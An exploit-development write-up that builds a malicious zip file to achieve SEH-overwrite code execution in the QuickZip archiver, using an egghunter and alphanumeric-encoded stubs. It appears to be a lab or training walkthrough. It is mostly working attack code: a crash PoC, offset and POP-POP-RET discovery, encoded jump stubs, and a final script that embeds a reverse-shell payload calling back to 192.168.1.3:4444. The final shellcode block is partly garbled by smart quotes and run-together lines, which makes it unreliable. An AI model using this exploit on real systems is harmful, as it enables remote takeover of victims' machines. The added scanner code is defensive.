SEH + Egghunter QuickZip Exploit

Initial Script

#!/usr/bin/python
# Crash PoC: a local file header (PK\x03\x04) and a central directory entry (PK\x01\x02)
# that both declare a file-name length of 0x0fe4 = 4068 bytes (4064 'A's + ".txt"),
# followed by the end-of-central-directory record (PK\x05\x06), whose directory size
# (0x1012 = 46 + 4068) and offset (0x1002 = 30 + 4068) match that length.
header_1 = ("\x50\x4B\x03\x04\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"
            "\x00\x00\x00\x00\x00\x00\x00\x00\xe4\x0f\x00\x00\x00")
header_2 = ("\x50\x4B\x01\x02\x14\x00\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"
            "\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe4\x0f\x00\x00\x00\x00\x00\x00\x01\x00"
            "\x24\x00\x00\x00\x00\x00\x00\x00")
header_3 = ("\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00"
            "\x12\x10\x00\x00\x02\x10\x00\x00\x00\x00")
payload = "A" * 4064
payload += ".txt"
exploit = header_1 + payload + header_2 + payload + header_3
myfile = open('kalisa.zip', 'w')
myfile.write(exploit)
myfile.close()

Crash

Open the zip file in QuickZip, attach Immunity Debugger, and try to extract it; the crash happens on extraction.
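As an added defensive example (my code, not part of the original writeup): the crash file above works by declaring a file-name length of 0x0fe4 = 4068 bytes in the local file header, so a scanner that walks the PK\x03\x04 headers and compares the declared name length against a sane bound flags this kind of archive before an extractor touches it. The 260-byte threshold, the helper names and the sample archives are assumptions constructed here.

```python
import struct

# ZIP local file header: "PK\x03\x04" plus 26 bytes of fixed fields (30 bytes total),
# then the file name (name_len bytes) and the extra field (extra_len bytes).
LOCAL_SIG = b"PK\x03\x04"
LOCAL_FMT = "<4sHHHHHIIIHH"            # sig, ver, flags, method, time, date, crc, csize, usize, nlen, xlen
LOCAL_LEN = struct.calcsize(LOCAL_FMT)  # 30
MAX_SANE_NAME_LEN = 260                 # assumed threshold (Windows MAX_PATH); the PoC declares 4068


def iter_local_headers(data):
    """Yield (offset, name_len, name_bytes, truncated) for each local file header in data.

    truncated is True when the declared name_len runs past the end of the buffer,
    which is itself a sign of a crafted or damaged archive.
    """
    pos = 0
    while True:
        pos = data.find(LOCAL_SIG, pos)
        if pos < 0 or pos + LOCAL_LEN > len(data):
            return
        fields = struct.unpack(LOCAL_FMT, data[pos:pos + LOCAL_LEN])
        csize, name_len, extra_len = fields[7], fields[9], fields[10]
        name_start = pos + LOCAL_LEN
        name = data[name_start:name_start + name_len]
        yield pos, name_len, name, len(name) < name_len
        # Skip the name, the extra field and the (stored) file data; always advance at least one byte.
        pos = max(pos + 1, name_start + name_len + extra_len + csize)


def find_oversized_names(data, limit=MAX_SANE_NAME_LEN):
    """Return one finding per local header whose declared file-name length is suspicious."""
    findings = []
    for offset, name_len, name, truncated in iter_local_headers(data):
        if name_len > limit or truncated:
            findings.append({
                "offset": offset,
                "name_len": name_len,
                "truncated": truncated,
                "name_prefix": name[:12].decode("latin-1", "replace"),
            })
    return findings


def build_local_header(name, file_data=b""):
    """Constructed helper: pack a minimal 'stored' local file header (same time/date words as the PoC)."""
    fixed = struct.pack(LOCAL_FMT, LOCAL_SIG, 20, 0, 0, 0xACB7, 0x34CE, 0,
                        len(file_data), len(file_data), len(name), 0)
    return fixed + name + file_data


# Constructed samples: a normal entry and an entry carrying the PoC's 4064 'A's + ".txt" name.
BENIGN_ZIP = build_local_header(b"hello.txt", b"hello")
LONG_NAME_ZIP = build_local_header(b"A" * 4064 + b".txt")
MIXED_ZIP = BENIGN_ZIP + LONG_NAME_ZIP

if __name__ == "__main__":
    for label, blob in (("benign", BENIGN_ZIP), ("long name", LONG_NAME_ZIP), ("mixed", MIXED_ZIP)):
        print(label, find_oversized_names(blob))
```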

Offset

[Immunity Debugger screenshot: paused at the crash in kernel32.7C812FD3 (called from ntdll.RtlRaiseException), exception 0EEDFADE, with QuickZip's "Runtime error at 00000000" message visible in the dump window]

SEH Chain

[Screenshot: SEH chain window; every handler still points into QuickZip, user32 or kernel32]

After Shift + F9

[Screenshot: after Shift+F9 QuickZip raises an access violation when writing; the stack window shows the SEH record at 0012FBFC and the ".txt" / ".TXT" strings near a CompareStringA call]

Seh chain again

Address    SE handler
0012F990   QuickZip.005437DE
0012FBFC   6B41396A
41386941   *** CORRUPT ENTRY ***

Offset

root@kalisa:~# locate pattern_offset
/usr/bin/msf-pattern_offset
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb
root@kalisa:~# /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 6b41396a
[*] Exact match at offset 294

EIP Control

[Screenshot: access violation when executing [42424242]; EIP = 42424242]

POP-POP-RET

!mona seh
[+] Results:
    (the first 20 pointers listed; every one is pop ecx # pop ebp # ret 0x04 in QuickZip.exe,
     flagged startnull / asciiprint / ascii, with ASLR: False, Rebase: False, SafeSEH: False, OS: False)
    ...
Found a total of 7973 pointers
Done. Only the first 20 pointers are shown here. For more pointers, open seh.txt.
offset = "A"*(298-4)
nseh = "B"*4
seh = "\x33\x28\x42\x00"      # pop pop ret 00422833
junk = "A"* (4064-298-4)
payload = offset + nseh + seh + junk
payload += ".txt"

Pass the exception to the application

[Screenshot: after passing the exception, EIP = 00422833 (QuickZip POP ECX / POP EBP / RETN 4); the stack shows the "BBBB3(B" SEH record and the returns into ntdll]

Press Shift+F7 three times and we land on nSEH, which is '\x42'.

[Screenshot: EIP = 0012FBFC, executing the \x42 (INC EDX) bytes of nSEH on the stack]

Bad Characters

!mona bytearray
Python: for i in range(0,256): print('\\x%02X' % i, end='')
Bash:   for i in {0..255}; do printf "\\\x%02x" $i; done

offset = "A"*298
nseh = "B"*4
seh = "C"*4
bad = "\x00…..\xff"     # every byte value; drop each confirmed bad character and rerun
junk = "A"* (4064-298-4-4-len(bad))
payload = offset + nseh + seh + bad + junk   # bad must be in the buffer for mona compare to find it
payload += ".txt"

!mona bytearray
!mona compare -f bytearray.bin -a [address where array begins]

Mangled Characters

Byte sent -> byte seen in memory:
\x80 -> C7   \x81 -> FC   \x82 -> E9   \x83 -> E2
\x84 -> E4   \x85 -> E0   \x86 -> E5   \x87 -> E7
\x88 -> EA   \x89 -> EB   \x8a -> E8   \x8b -> EF
\x8c -> EE   \x8d -> EC   \x8e -> C4   \x8f -> C5
\x90 -> C9   \x91 -> E6   \x92 -> C6   \x93 -> F4
\x94 -> F6   \x95 -> F2   \x96 -> FB   \x97 -> F9
\x98 -> FF   \x99 -> D6   \x9a -> DC   \x9b -> A2
\x9c -> A3   \x9d -> A5   \x9e -> 50   \x9f -> 83
This is the OEM (CP437) to ANSI (Windows-1252) conversion applied to the file name: 0x80 'Ç' becomes C7 and 0x9f 'ƒ' becomes 83, which is why bytes from \x80 upward cannot be used as they are.
[Screenshot: bad-character run; Immunity reports an access violation when reading [4141413D], with the dump beside a Notepad list of which bytes from \x80 upward were altered]

JMP BACK

\x9f is mangled to \x83, which is -125 as a signed byte. When we use nseh = \x71\x9f\x70\x9f (JNO -125 / JO -125), before the JMP:

[Screenshot: at 0012FBFC nSEH disassembles as JNO SHORT 0012FB81 / JO SHORT 0012FB83]

After the JMP

[Screenshot: after the jump, EIP = 0012FB81 inside the run of 41 (INC ECX) bytes]

Address difference: 0012FBFC – 0012FB81 = 7B (123 in decimal), not 125, because the 2-byte JNO instruction itself is counted in the jump distance.
As a sanity check, split the offset as "A"*171 + "B"*123; after the JNO we should land on the first of the B's.

[Screenshot: 0012FB7B–0012FB80 hold 41 (A) and 0012FB81 onward hold 42 (B): the JNO lands exactly on the first B]

Let's check whether the junk is still in memory: press M (memory map) in Immunity and search for DDDDDDDDDDDDDDD.

[Screenshot: Immunity memory map with "Enter binary string to search for" set to DDDDDDDDDDDDDDD, searching the entire block]

So we can still place our shellcode in memory

Egghunter – Encoded

!mona egghunter
Save the output in egghunter.txt, then:
cat egghunter.txt | tr -d '"' | tr -d '\n' | tr -d '\\x' | xxd -r -p > egghunter.bin
msfvenom -p generic/custom PAYLOADFILE=egghunter.bin -e x86/alpha_mixed BufferRegister=EDX -a x86 --platform Windows

root@kalisa:~# cat egghunter.txt | tr -d '"' | tr -d '\n' | tr -d '\\x' | xxd -r -p > egghunter.bin
root@kalisa:~# msfvenom -p generic/custom PAYLOADFILE=egghunter.bin -e x86/alpha_mixed BufferRegister=EDX -a x86 --platform Windows
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/alpha_mixed
x86/alpha_mixed succeeded with size 117 (iteration=0)
x86/alpha_mixed chosen with final size 117
Payload size: 117 bytes
encoded_egghunter = "JJJJJJJJJJJJJJJJJ7RYjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI2FMQyZYovoBbqBcZwrpXZm4nwLveCjd48omh3GP0VPCDlKijNO0uYznOt5HgkO8gAA"
offset = "A"*27 + encoded_egghunter + "A"*27     # total of 171
offset += "B"*123                                 # total offset = 171 + 123 = 294
nseh = "B"*4
seh = "\x33\x28\x42\x00"                          # pop pop ret 00422833
junk = "D"* (4064-298-4)

payload = offset + nseh + seh + junk
payload += ".txt"

In the end, the payload will look like the following:
"A"*n + egghunter + "JMP [egghunter]" + POPPOPRET + [Egg + Shellcode]

Get to the Egghunter Payload

Now we’ll use the remaining 123 bytes to get to our egghunter
Plan:
1. Zero out EAX
2. Calculate the value of the address of our shellcode, in little-endian order
3. Push the address in EAX onto the stack
4. Pop the value into EDX
5. Zero out EAX (not strictly necessary, but easier math)
6. Push ESP onto the stack
7. Pop the value into EAX
8. Adjust the stack address to point to an address below our decoder so that once we've decoded it, we automatically execute it
9. Push EAX onto the stack
10. Pop the value into ESP, making it so that if we push a value, we'll be writing below our current execution
11. Push the JMP EDX instruction

Opcodes that we need (from nasm_shell):
The address of our shellcode in memory
POP EDX opcode = \x5A
PUSH ESP opcode = \x54
POP EAX opcode = \x58
PUSH EAX opcode = \x50
POP ESP opcode = \x5C
JMP EDX opcode = \xFF\xE2
nasm_shell.rb

root@kalisa:~# /usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
nasm > pop edx
00000000  5A                pop edx
nasm > push esp
00000000  54                push esp
nasm > pop eax
00000000  58                pop eax
nasm > push eax
00000000  50                push eax
nasm > pop esp
00000000  5C                pop esp
nasm > jmp edx
00000000  FFE2              jmp edx

The address of egghunter:
The egghunter between the A's starts at 0012FAF1 (below). That address is not divisible by 4, so we start it one byte earlier with the following: "A"*26 + egghunter + "A"*28

[Screenshot: 0012FAEA–0012FAF0 are 41 (INC ECX); the egghunter's first byte sits at 0012FAF1]

Now our egghunter starts at 0012FAF0

[Screenshot: with "A"*26 the egghunter now begins at 0012FAF0]

The address of our shellcode in memory = 0012FAF0
POP EDX opcode = \x5A
PUSH ESP opcode = \x54
POP EAX opcode = \x58
PUSH EAX opcode = \x50
POP ESP opcode = \x5C
JMP EDX opcode = \xFF\xE2
Zero out EAX (using AND EAX)
AND EAX = \x25

%JMNU : \x25\x4a\x4d\x4e\x55 : AND EAX,0x554E4D4A
%521* : \x25\x35\x32\x31\x2a : AND EAX,0x2A313235
Binary of the two masks (32 bits each):
0x554E4D4A = 0101 0101 0100 1110 0100 1101 0100 1010
0x2A313235 = 0010 1010 0011 0001 0011 0010 0011 0101
No bit position is set in both, so AND'ing EAX with one and then the other leaves 0.

Encoding a Value:

Shellcode address = 0012FAF0
Little-endian format: \xF0\xFA\x12\x00
Complement: \x00\x12\xFA\xF0
Value the SUBs must total (2^32 minus the address): hexOfDecimal(4294967296 - decimalOfHex(0012FAF0)) = FFED0510
decimalOfHex(0012FAF0) = 1243888
4294967296 – 1243888 = 4293723408
4293723408 in hex is FFED0510

Zero out EAX + PUSH EAX + POP EDX
!mona encode -t alphanum -s ‘\xF0\xFA\x12\x00’

Results:
%JMNU : \x25\x4a\x4d\x4e\x55 : AND EAX,0x554E4D4A
%521* : \x25\x35\x32\x31\x2a : AND EAX,0x2A313235
-ZVNU : \x2d\x5a\x56\x4e\x55 : SUB EAX,0x554e565a
-ZVNU : \x2d\x5a\x56\x4e\x55 : SUB EAX,0x554e565a
-\XPU : \x2d\x5c\x58\x50\x55 : SUB EAX,0x5550585c
P     : \x50 : PUSH EAX
Full encoded string: %JMNU%521*-ZVNU-ZVNU-\XPUP
Full encoded hex: \x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x5a\x56\x4e\x55\x2d\x5a\x56\x4e\x55\x2d\x5c\x58\x50\x55\x50

# 27 bytes
shellcode_to_edx = (
    "\x25\x4a\x4d\x4e\x55"    # AND EAX,0x554E4D4A
    "\x25\x35\x32\x31\x2a"    # AND EAX,0x2A313235
    "\x2d\x5a\x56\x4e\x55"    # SUB EAX,0x554e565a
    "\x2d\x5a\x56\x4e\x55"    # SUB EAX,0x554e565a
    "\x2d\x5c\x58\x50\x55"    # SUB EAX,0x5550585c
    "\x50"                    # PUSH EAX
    "\x5A"                    # POP EDX
)

So we use 27 bytes to get our shellcode location into EDX

[Screenshot: EIP = 0012FB81 at the start of the B's; the listing continues with AND EAX,554E4D4A / AND EAX,2A313235 / the three SUB EAX / PUSH EAX / POP EDX]

Decode Stack Alignment

The place to align the stack to, where our JMP EDX will be decoded (it needs to be a multiple of four).
SUB EAX opcode = \x2d


Place for it: 0012FBF8
ESP: 0012F5C0
0012F5C0 (ESP) - 0012FBF8 (Target) = FFFFF9C8
FFFFF9C8 / 3 = 55555342, split into 55 55 53 42 | 55 55 53 42 | 55 55 53 44

# 19 bytes
decode_stack_alignment = (
    "\x54"                    # PUSH ESP
    "\x58"                    # POP EAX
    "\x2d\x42\x53\x55\x55"    # SUB EAX, 0x55555342
    "\x2d\x42\x53\x55\x55"    # SUB EAX, 0x55555342
    "\x2d\x44\x53\x55\x55"    # SUB EAX, 0x55555344
    "\x50"                    # PUSH EAX
    "\x5c"                    # POP ESP
)

EAX is full of egghunter


After POP EDX, EDX now holds the egghunter


After POP EAX, EAX no longer holds the egghunter


After POP ESP, ESP holds the address 0012FBF8, which is where we want to go


Overall, our payload now looks like the following:

encoded_egghunter = "JJJJJJJJJJJJJJJJJ7RYjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI2FMQyZYovoBbqBcZwrpXZm4nwLveCjd48omh3GP0VPCDlKijNO0uYznOt5HgkO8gAA"
offset = "A"*26 + encoded_egghunter + "A"*28           # total of 171
offset += "B"*4 + shellcode_to_edx + decode_stack_alignment
offset += "B"*(123-4-len(shellcode_to_edx)-len(decode_stack_alignment))
nseh = "\x71\x9f\x70\x9f"
seh = "\x33\x28\x42\x00"      # pop pop ret 00422833
junk = "D"* (4064-298-4)
payload = offset + nseh + seh + junk
payload += ".txt"

Encode JMP EDX

!mona encode -t alphanum -s '\x90\x90\xFF\xE2'

Results:
  %JMNU : \x25\x4a\x4d\x4e\x55 : AND EAX,0x554E4D4A
  %521* : \x25\x35\x32\x31\x2a : AND EAX,0x2A313235
  -%%U^ : \x2d\x25\x25\x55\x5e : SUB EAX,0x5e552525
  -%%U^ : \x2d\x25\x25\x55\x5e : SUB EAX,0x5e552525
  -&%V` : \x2d\x26\x25\x56\x60 : SUB EAX,0x60562526
  P     : \x50                 : PUSH EAX
Full encoded string: %JMNU%521*-%%U^-%%U^-&%V`P
Full encoded hex: \x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x25\x25\x55\x5e\x2d\x25\x25\x55\x5e\x2d\x26\x25\x56\x60\x50
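The arithmetic behind the three encodings on this page (the shellcode address into EDX, the stack realignment SUBs, and this JMP EDX block) can be re-derived offline. This is an added Python check, not the author's or mona's code; every constant is taken from the write-up, and the helper names are mine.

```python
MASK = 0xFFFFFFFF

def twos_complement(value):
    """32-bit two's complement, (2**32 - value) mod 2**32, as the write-up does by hand."""
    return (-value) & MASK

def eax_after_chain(and_masks, sub_values, eax):
    """Emulate the encoder's AND ... SUB ... sequence on a 32-bit EAX starting at `eax`."""
    for m in and_masks:
        eax &= m
    for s in sub_values:
        eax = (eax - s) & MASK
    return eax

def encodes_to(and_masks, sub_values, target):
    """True if the chain leaves EAX == target no matter what EAX held beforehand."""
    return all(eax_after_chain(and_masks, sub_values, start) == target
               for start in (0, 0x0012F5C0, 0xDEADBEEF, MASK))

def all_bytes_printable(value):
    """True if each byte of the 32-bit immediate is printable ASCII (what -t alphanum must emit)."""
    return all(0x21 <= b <= 0x7E for b in value.to_bytes(4, "little"))

# The constants below are the values mona and the write-up print (constructed test data).
AND_MASKS = (0x554E4D4A, 0x2A313235)          # the two AND masks reused by every block
# Block 1: leave the shellcode address 0012FAF0 in EAX, then PUSH EAX / POP EDX.
SHELLCODE_ADDR = 0x0012FAF0
SUBS_SHELLCODE_ADDR = (0x554E565A, 0x554E565A, 0x5550585C)
# Block 2: produce the bytes 90 90 FF E2 (NOP NOP JMP EDX). PUSH EAX stores the dword
# little-endian, so EAX must hold those four bytes read as a little-endian integer.
JMP_EDX_DWORD = int.from_bytes(b"\x90\x90\xFF\xE2", "little")   # 0xE2FF9090
SUBS_JMP_EDX = (0x5E552525, 0x5E552525, 0x60562526)
# Block 3: PUSH ESP / POP EAX, three SUBs, PUSH EAX / POP ESP moves ESP from
# 0012F5C0 to 0012FBF8; no AND is needed because EAX starts as the known ESP.
ESP_BEFORE_ALIGN = 0x0012F5C0
ESP_TARGET = 0x0012FBF8
SUBS_STACK_ALIGN = (0x55555342, 0x55555342, 0x55555344)

def check_page_values():
    """Re-derive the numbers stated in the write-up and return them for inspection."""
    immediates = AND_MASKS + SUBS_SHELLCODE_ADDR + SUBS_JMP_EDX + SUBS_STACK_ALIGN
    return {
        "and_masks_cancel": (AND_MASKS[0] & AND_MASKS[1]) == 0,
        "complement_of_shellcode_addr": twos_complement(SHELLCODE_ADDR),            # 0xFFED0510
        "shellcode_addr_ok": encodes_to(AND_MASKS, SUBS_SHELLCODE_ADDR, SHELLCODE_ADDR),
        "jmp_edx_ok": encodes_to(AND_MASKS, SUBS_JMP_EDX, JMP_EDX_DWORD),
        "stack_delta": (ESP_BEFORE_ALIGN - ESP_TARGET) & MASK,                       # 0xFFFFF9C8
        "esp_after_align": eax_after_chain((), SUBS_STACK_ALIGN, ESP_BEFORE_ALIGN),  # 0x0012FBF8
        "all_immediates_printable": all(all_bytes_printable(v) for v in immediates),
    }

if __name__ == "__main__":
    for name, value in check_page_values().items():
        print(name, hex(value) if type(value) is int else value)
```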

Overall exploit:

encoded_egghunter = "JJJJJJJJJJJJJJJJJ7RYjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI2FMQyZYovoBbqBcZwrpXZm4nwLveCjd48omh3GP0VPCDlKijNO0uYznOt5HgkO8gAA"
# 27 bytes
shellcode_to_edx = (
    "\x25\x4a\x4d\x4e\x55"    # AND EAX,0x554E4D4A
    "\x25\x35\x32\x31\x2a"    # AND EAX,0x2A313235
    "\x2d\x5a\x56\x4e\x55"    # SUB EAX,0x554e565a
    "\x2d\x5a\x56\x4e\x55"    # SUB EAX,0x554e565a
    "\x2d\x5c\x58\x50\x55"    # SUB EAX,0x5550585c
    "\x50"                    # PUSH EAX
    "\x5A"                    # POP EDX
)
# 19 bytes
decode_stack_alignment = (
    "\x54"                    # PUSH ESP
    "\x58"                    # POP EAX
    "\x2d\x42\x53\x55\x55"    # SUB EAX, 0x55555342
    "\x2d\x42\x53\x55\x55"    # SUB EAX, 0x55555342
    "\x2d\x44\x53\x55\x55"    # SUB EAX, 0x55555344
    "\x50"                    # PUSH EAX
    "\x5c"                    # POP ESP
)
# 26 bytes
encoded_jmp_edx = (
    "\x25\x4a\x4d\x4e\x55"    # AND EAX,0x554E4D4A
    "\x25\x35\x32\x31\x2a"    # AND EAX,0x2A313235
    "\x2d\x25\x25\x55\x5e"    # SUB EAX,0x5e552525
    "\x2d\x25\x25\x55\x5e"    # SUB EAX,0x5e552525
    "\x2d\x26\x25\x56\x60"    # SUB EAX,0x60562526
    "\x50"                    # PUSH EAX
)
# will be total of 294
offset = "A"*26 + encoded_egghunter + "A"*28           # total of 171
offset += "B"*4 + shellcode_to_edx + decode_stack_alignment + encoded_jmp_edx
offset += "C"*(123-4-len(shellcode_to_edx)-len(decode_stack_alignment)-len(encoded_jmp_edx))
nseh = "\x71\x9f\x70\x9f"
seh = "\x33\x28\x42\x00"      # pop pop ret 00422833
junk = "D"* (4064-298-4)
payload = offset + nseh + seh + junk
payload += ".txt"

Final Exploit and Shellcode

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.3 LPORT=4444 -e x86/alpha_mixed -a x86 --platform windows -f python -v shellcode

#!/usr/bin/python
header_1 = ("\x50\x4B\x03\x04\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"
            "\x00\x00\x00\x00\x00\x00\x00\x00\xe4\x0f\x00\x00\x00")
header_2 = ("\x50\x4B\x01\x02\x14\x00\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"
            "\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe4\x0f\x00\x00\x00\x00\x00\x00\x01\x00"
            "\x24\x00\x00\x00\x00\x00\x00\x00")
header_3 = ("\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00"
            "\x12\x10\x00\x00\x02\x10\x00\x00\x00\x00")
# 710 bytesshellcode =  “w00tw00t”shellcode += “\x89\xe1\xdb\xda\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49″shellcode += “\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51″shellcode += “\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32″shellcode += “\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41″shellcode += “\x42\x75\x4a\x49\x4b\x4c\x4d\x38\x4f\x72\x57\x70\x35\x50″shellcode += “\x77\x70\x65\x30\x4f\x79\x69\x75\x64\x71\x6b\x70\x50\x64″shellcode += “\x4e\x6b\x36\x30\x30\x30\x4e\x6b\x70\x52\x34\x4c\x6c\x4b”shellcode += “\x72\x72\x76\x74\x6e\x6b\x62\x52\x37\x58\x44\x4f\x6d\x67″shellcode += “\x50\x4a\x66\x46\x75\x61\x4b\x4f\x6c\x6c\x77\x4c\x71\x71″shellcode += “\x31\x6c\x77\x72\x44\x6c\x57\x50\x6b\x71\x7a\x6f\x64\x4d”shellcode += “\x57\x71\x48\x47\x7a\x42\x4c\x32\x52\x72\x46\x37\x6e\x6b”shellcode += “\x43\x62\x34\x50\x4e\x6b\x32\x6a\x77\x4c\x4e\x6b\x32\x6c”shellcode += “\x67\x61\x31\x68\x48\x63\x53\x78\x37\x71\x6e\x31\x43\x61″shellcode += “\x6c\x4b\x53\x69\x35\x70\x66\x61\x4a\x73\x4e\x6b\x50\x49″shellcode += “\x37\x68\x7a\x43\x35\x6a\x47\x39\x4e\x6b\x46\x54\x6c\x4b”shellcode += “\x56\x61\x48\x56\x30\x31\x79\x6f\x6c\x6c\x79\x51\x38\x4f”shellcode += “\x74\x4d\x53\x31\x5a\x67\x70\x38\x79\x70\x71\x65\x39\x66″shellcode += “\x34\x43\x51\x6d\x4b\x48\x77\x4b\x51\x6d\x45\x74\x64\x35″shellcode += “\x59\x74\x70\x58\x4e\x6b\x53\x68\x75\x74\x36\x61\x68\x53″shellcode += “\x33\x56\x6e\x6b\x74\x4c\x30\x4b\x6e\x6b\x63\x68\x67\x6c”shellcode += “\x57\x71\x5a\x73\x4c\x4b\x34\x44\x6c\x4b\x53\x31\x58\x50″shellcode += “\x6e\x69\x63\x74\x66\x44\x44\x64\x63\x6b\x31\x4b\x61\x71″shellcode += “\x70\x59\x51\x4a\x56\x31\x39\x6f\x6d\x30\x51\x4f\x31\x4f”shellcode += “\x51\x4a\x6c\x4b\x32\x32\x7a\x4b\x6e\x6d\x73\x6d\x42\x48″shellcode += “\x30\x33\x67\x42\x53\x30\x75\x50\x55\x38\x31\x67\x32\x53″shellcode += “\x76\x52\x51\x4f\x73\x64\x73\x58\x52\x6c\x50\x77\x47\x56″shellcode += “\x53\x37\x4b\x4f\x4b\x65\x68\x38\x6e\x70\x36\x61\x73\x30″shellcode += 
“\x77\x70\x31\x39\x6a\x64\x43\x64\x50\x50\x33\x58\x76\x49″shellcode += “\x4b\x30\x72\x4b\x55\x50\x59\x6f\x48\x55\x76\x30\x36\x30″shellcode += “\x52\x70\x32\x70\x73\x70\x52\x70\x37\x30\x62\x70\x72\x48″shellcode += “\x78\x6a\x54\x4f\x59\x4f\x4b\x50\x4b\x4f\x69\x45\x4c\x57″shellcode += “\x31\x7a\x44\x45\x50\x68\x79\x50\x4d\x78\x67\x71\x32\x31″shellcode += “\x55\x38\x67\x72\x47\x70\x64\x51\x61\x4c\x6c\x49\x68\x66″shellcode += “\x30\x6a\x36\x70\x42\x76\x73\x67\x55\x38\x4c\x59\x6c\x65″shellcode += “\x51\x64\x53\x51\x79\x6f\x6b\x65\x4f\x75\x6b\x70\x50\x74″shellcode += “\x74\x4c\x69\x6f\x70\x4e\x56\x68\x74\x35\x68\x6c\x73\x58″shellcode += “\x38\x70\x78\x35\x59\x32\x30\x56\x6b\x4f\x4e\x35\x31\x78″shellcode += “\x63\x53\x50\x6d\x70\x64\x35\x50\x4f\x79\x7a\x43\x72\x77″shellcode += “\x71\x47\x42\x77\x70\x31\x78\x76\x33\x5a\x77\x62\x52\x79″shellcode += “\x31\x46\x49\x72\x39\x6d\x63\x56\x6f\x37\x47\x34\x37\x54″shellcode += “\x57\x4c\x57\x71\x45\x51\x6c\x4d\x31\x54\x46\x44\x64\x50″shellcode += “\x7a\x66\x73\x30\x33\x74\x66\x34\x32\x70\x62\x76\x66\x36″shellcode += “\x30\x56\x53\x76\x62\x76\x30\x4e\x42\x76\x63\x66\x71\x43″shellcode += “\x53\x66\x55\x38\x70\x79\x5a\x6c\x67\x4f\x6b\x36\x59\x6f”shellcode += “\x78\x55\x6b\x39\x39\x70\x30\x4e\x61\x46\x52\x66\x39\x6f”shellcode += “\x70\x30\x32\x48\x74\x48\x6d\x57\x65\x4d\x53\x50\x69\x6f”shellcode += “\x4b\x65\x4d\x6b\x4c\x30\x78\x35\x39\x32\x52\x76\x63\x58″shellcode += “\x4e\x46\x4f\x65\x6d\x6d\x6d\x4d\x6b\x4f\x38\x55\x45\x6c”shellcode += “\x57\x76\x53\x4c\x77\x7a\x6b\x30\x4b\x4b\x79\x70\x54\x35″shellcode += “\x67\x75\x4f\x4b\x50\x47\x74\x53\x30\x72\x62\x4f\x50\x6a”shellcode += “\x67\x70\x72\x73\x6b\x4f\x59\x45\x41\x41”
# 117 bytes
#egghunter = ("JJJJJJJJJJJJJJJJJ7RYjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI2FMQyZYovoBbqBcZwrpXZm4nwLveCjd48omh3GP0VPCDlKijNO0uYznOt5HgkO8gAA")
egghunter = ("JJJJJJJJJJJJJJJJJ7RYjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI2FmQIZYoFoPB0Rpj321HhMfNUl4ERzbTzOOHPwp0FPCDLK8zlo3ExjloBUIwYom7AA")
# 27 bytes
shellcode_to_edx = ("\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x5a\x56\x4e\x55\x2d\x5a\x56\x4e\x55\x2d\x5c\x58\x50\x55\x50\x5A")
# 19 bytes
decode_stack_alignment = ("\x54\x58\x2d\x42\x53\x55\x55\x2d\x42\x53\x55\x55\x2d\x44\x53\x55\x55\x50\x5c")
# 26 bytes
encoded_jmp_edx = ("\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x25\x25\x55\x5e\x2d\x25\x25\x55\x5e\x2d\x26\x25\x56\x60\x50")
# 171 - 117 = 54, 54/2 = 27
offset = "A"*26 + egghunter + "A"*28
offset += "B" * 4 + shellcode_to_edx + decode_stack_alignment + encoded_jmp_edx
offset += "C"*(123-4-len(shellcode_to_edx)-len(decode_stack_alignment)-len(encoded_jmp_edx))
nseh = "\x71\x9f\x70\x9f"
seh = "\x33\x28\x42\x00"     # 00422833
junk = "D"* 4 + shellcode + "D"* (4064-294-4-4-4-len(shellcode))
payload = offset + nseh + seh + junk
payload += ".txt"
exploit = header_1 + payload + header_2 + payload + header_3
myfile = open('try.zip','w');myfile.write(exploit);myfile.close()

Explanation

|  Location            |  Address                                  |
|----------------------|-------------------------------------------|
|  Encoded shellcode   |  0012FAF0                                 |
|  A buffer start      |  0012FB63                                 |
|  jmp here (seh)      |  0012FB81                                 |
|  shellcode_to_edx    |  0012FB85 (edx=12faf0 holds shellcode)    |
|  stack align         |  0012FBA0 (esp = 12FBF8)                  |
|  jmp_edx             |  0012FBB3 (esp = 12FBF4)                  |
|  B buffer start      |  0012FBCD                                 |
|  JMP EDX             |  0012FBF6 (jump to 0012FAF0)              |
|  A buffer ends       |  0012FBFB                                 |
|  JMP back (nseh)     |  0012FBFC                                 |
